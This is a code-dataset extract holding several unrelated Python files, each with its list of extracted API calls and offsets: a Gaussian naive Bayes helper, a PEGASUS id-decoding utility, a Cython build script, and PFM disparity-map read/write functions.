for i in range(numAttributes):
mean[i] = np.mean(features[:, i])
stdDev[i] = np.std(features[:, i])
# Ensure variance stays above 0.0001:
if stdDev[i] < 0.01:
stdDev[i] = 0.01
return mean, stdDev
| [
"numpy.size",
"numpy.std",
"numpy.square",
"numpy.zeros",
"numpy.append",
"numpy.mean",
"numpy.array",
"numpy.exp",
"collections.Counter",
"numpy.sqrt"
] | [((1159, 1174), 'numpy.size', 'np.size', (['labels'], {}), '(labels)\n', (1166, 1174), True, 'import numpy as np\n'), ((1218, 1233), 'collections.Counter', 'Counter', (['labels'], {}), '(labels)\n', (1225, 1233), False, 'from collections import Counter\n'), ((1614, 1637), 'numpy.array', 'np.array', (['[]'], {'dtype': 'int'}), '([], dtype=int)\n', (1622, 1637), True, 'import numpy as np\n'), ((2801, 2826), 'numpy.size', 'np.size', (['features'], {'axis': '(1)'}), '(features, axis=1)\n', (2808, 2826), True, 'import numpy as np\n'), ((2839, 2862), 'numpy.zeros', 'np.zeros', (['numAttributes'], {}), '(numAttributes)\n', (2847, 2862), True, 'import numpy as np\n'), ((2876, 2899), 'numpy.zeros', 'np.zeros', (['numAttributes'], {}), '(numAttributes)\n', (2884, 2899), True, 'import numpy as np\n'), ((1695, 1710), 'numpy.size', 'np.size', (['labels'], {}), '(labels)\n', (1702, 1710), True, 'import numpy as np\n'), ((2504, 2518), 'numpy.exp', 'np.exp', (['exTerm'], {}), '(exTerm)\n', (2510, 2518), True, 'import numpy as np\n'), ((2954, 2977), 'numpy.mean', 'np.mean', (['features[:, i]'], {}), '(features[:, i])\n', (2961, 2977), True, 'import numpy as np\n'), ((2998, 3020), 'numpy.std', 'np.std', (['features[:, i]'], {}), '(features[:, i])\n', (3004, 3020), True, 'import numpy as np\n'), ((1736, 1752), 'numpy.size', 'np.size', (['classes'], {}), '(classes)\n', (1743, 1752), True, 'import numpy as np\n'), ((1890, 1919), 'numpy.append', 'np.append', (['classes', 'labels[i]'], {}), '(classes, labels[i])\n', (1899, 1919), True, 'import numpy as np\n'), ((2377, 2402), 'numpy.square', 'np.square', (['(feature - mean)'], {}), '(feature - mean)\n', (2386, 2402), True, 'import numpy as np\n'), ((2465, 2483), 'numpy.sqrt', 'np.sqrt', (['(2 * np.pi)'], {}), '(2 * np.pi)\n', (2472, 2483), True, 'import numpy as np\n'), ((2409, 2426), 'numpy.square', 'np.square', (['stdDev'], {}), '(stdDev)\n', (2418, 2426), True, 'import numpy as np\n')] |
# Copyright 2020 The PEGASUS Authors..
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Library for evaluating generative text models."""
import numpy as np
def ids2str(encoder, ids, num_reserved):
"""Decode ids."""
if num_reserved:
eos = np.where(ids == 1)[0]
if np.any(eos):
ids = ids[:eos[0]]
reserved_tokens = np.where(ids < num_reserved)[0]
if reserved_tokens.size:
split_locations = np.union1d(reserved_tokens, reserved_tokens + 1)
ids_list = np.split(ids, split_locations)
text_list = [
"<%d>" %
i if len(i) == 1 and i < num_reserved else encoder.decode(i.tolist())
for i in ids_list
]
return " ".join(text_list)
return encoder.decode(ids.flatten().tolist())
| [
"numpy.any",
"numpy.where",
"numpy.union1d",
"numpy.split"
] | [((782, 793), 'numpy.any', 'np.any', (['eos'], {}), '(eos)\n', (788, 793), True, 'import numpy as np\n'), ((753, 771), 'numpy.where', 'np.where', (['(ids == 1)'], {}), '(ids == 1)\n', (761, 771), True, 'import numpy as np\n'), ((842, 870), 'numpy.where', 'np.where', (['(ids < num_reserved)'], {}), '(ids < num_reserved)\n', (850, 870), True, 'import numpy as np\n'), ((927, 975), 'numpy.union1d', 'np.union1d', (['reserved_tokens', '(reserved_tokens + 1)'], {}), '(reserved_tokens, reserved_tokens + 1)\n', (937, 975), True, 'import numpy as np\n'), ((993, 1023), 'numpy.split', 'np.split', (['ids', 'split_locations'], {}), '(ids, split_locations)\n', (1001, 1023), True, 'import numpy as np\n')] |
# -*- coding: utf-8 -*-
"""
Setup file for copa_map.
Use setup.cfg to configure your project.
This file was generated with PyScaffold 3.3.1.
PyScaffold helps you to put up the scaffold of your new Python project.
Learn more under: https://pyscaffold.org/
"""
import sys
from pkg_resources import VersionConflict, require
from setuptools import Extension, setup
from Cython.Build import cythonize
import numpy
ext_modules = [
Extension(
"brescount",
["src/copa_map/util/brescount.pyx"],
extra_compile_args=["-O3", "-ffast-math", "-march=native", "-fopenmp"],
extra_link_args=['-fopenmp'],
include_dirs=[numpy.get_include()]
)
]
try:
require("setuptools>=38.3")
except VersionConflict:
print("Error: version of setuptools is too old (<38.3)!")
sys.exit(1)
if __name__ == "__main__":
setup(use_pyscaffold=True, ext_modules=cythonize(ext_modules))
| [
"pkg_resources.require",
"Cython.Build.cythonize",
"numpy.get_include",
"sys.exit"
] | [((707, 734), 'pkg_resources.require', 'require', (['"""setuptools>=38.3"""'], {}), "('setuptools>=38.3')\n", (714, 734), False, 'from pkg_resources import VersionConflict, require\n'), ((825, 836), 'sys.exit', 'sys.exit', (['(1)'], {}), '(1)\n', (833, 836), False, 'import sys\n'), ((909, 931), 'Cython.Build.cythonize', 'cythonize', (['ext_modules'], {}), '(ext_modules)\n', (918, 931), False, 'from Cython.Build import cythonize\n'), ((668, 687), 'numpy.get_include', 'numpy.get_include', ([], {}), '()\n', (685, 687), False, 'import numpy\n')] |
import os
import struct
import numpy as np
import cv2
def readPfm(filename):
f = open(filename, 'rb')
line = f.readline()
#assert line.strip() == "Pf" # one sample per pixel
line = f.readline()
items = line.strip().split()
width = int(items[0])
height = int(items[1])
line = f.readline()
if float(line.strip()) < 0: # little-endian
fmt = "<f"
else:
fmt = ">f"
maps = np.ndarray([height, width], dtype=np.float32)
for h in range(height-1, -1, -1):
for w in range(width):
sample = f.read(4)
maps[h, w], = struct.unpack(fmt, sample)
f.close()
return maps
def parseCalib(filename):
f = open(filename, "r")
lines = f.readlines()
f.close()
line = lines[4].strip()
idx = line.find('=')
width = int(line[idx+1:])
line = lines[5].strip()
idx = line.find('=')
height = int(line[idx+1:])
line = lines[6].strip()
idx = line.find('=')
ndisp = int(line[idx+1:])
return height, width, ndisp
def normal(mean, std_dev):
constant1 = 1. / (np.sqrt(2*np.pi) * std_dev)
constant2 = -1. / (2 * std_dev * std_dev)
return lambda x: constant1 * np.exp(constant2 * ((x - mean)**2))
def saveDisparity(disparity_map, filename):
assert len(disparity_map.shape) == 2
cv2.imwrite(filename, disparity_map)
def writePfm(disparity_map, filename):
assert len(disparity_map.shape) == 2
height, width = disparity_map.shape
disparity_map = disparity_map.astype(np.float32)
o = open(filename, "wb")
# header
o.write(b'Pf\n')
w_h = "{} {}\n".format(width, height)
o.write(w_h.encode('utf-8'))
o.write(b'-1.0\n')
# raster
# NOTE: bottom up
# little-endian
fmt = "<f"
for h in range(height-1, -1, -1):
for w in range(width):
o.write(struct.pack(fmt, disparity_map[h, w]))
o.close()
def saveTimeFile(times, path):
o = open(path, "w")
o.write("{}".format(times))
o.close()
def testMk(dirName):
if not os.path.isdir(dirName):
os.mkdir(dirName)
def recurMk(path):
items = path.split("/")
prefix = "/"
for item in items:
prefix = os.path.join(prefix, item)
testMk(prefix)
| [
"os.mkdir",
"os.path.join",
"os.path.isdir",
"cv2.imwrite",
"struct.unpack",
"struct.pack",
"numpy.exp",
"numpy.ndarray",
"numpy.sqrt"
] | [((431, 476), 'numpy.ndarray', 'np.ndarray', (['[height, width]'], {'dtype': 'np.float32'}), '([height, width], dtype=np.float32)\n', (441, 476), True, 'import numpy as np\n'), ((1327, 1363), 'cv2.imwrite', 'cv2.imwrite', (['filename', 'disparity_map'], {}), '(filename, disparity_map)\n', (1338, 1363), False, 'import cv2\n'), ((2046, 2068), 'os.path.isdir', 'os.path.isdir', (['dirName'], {}), '(dirName)\n', (2059, 2068), False, 'import os\n'), ((2078, 2095), 'os.mkdir', 'os.mkdir', (['dirName'], {}), '(dirName)\n', (2086, 2095), False, 'import os\n'), ((2201, 2227), 'os.path.join', 'os.path.join', (['prefix', 'item'], {}), '(prefix, item)\n', (2213, 2227), False, 'import os\n'), ((603, 629), 'struct.unpack', 'struct.unpack', (['fmt', 'sample'], {}), '(fmt, sample)\n', (616, 629), False, 'import struct\n'), ((1094, 1112), 'numpy.sqrt', 'np.sqrt', (['(2 * np.pi)'], {}), '(2 * np.pi)\n', (1101, 1112), True, 'import numpy as np\n'), ((1201, 1236), 'numpy.exp', 'np.exp', (['(constant2 * (x - mean) ** 2)'], {}), '(constant2 * (x - mean) ** 2)\n', (1207, 1236), True, 'import numpy as np\n'), ((1858, 1895), 'struct.pack', 'struct.pack', (['fmt', 'disparity_map[h, w]'], {}), '(fmt, disparity_map[h, w])\n', (1869, 1895), False, 'import struct\n')] |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.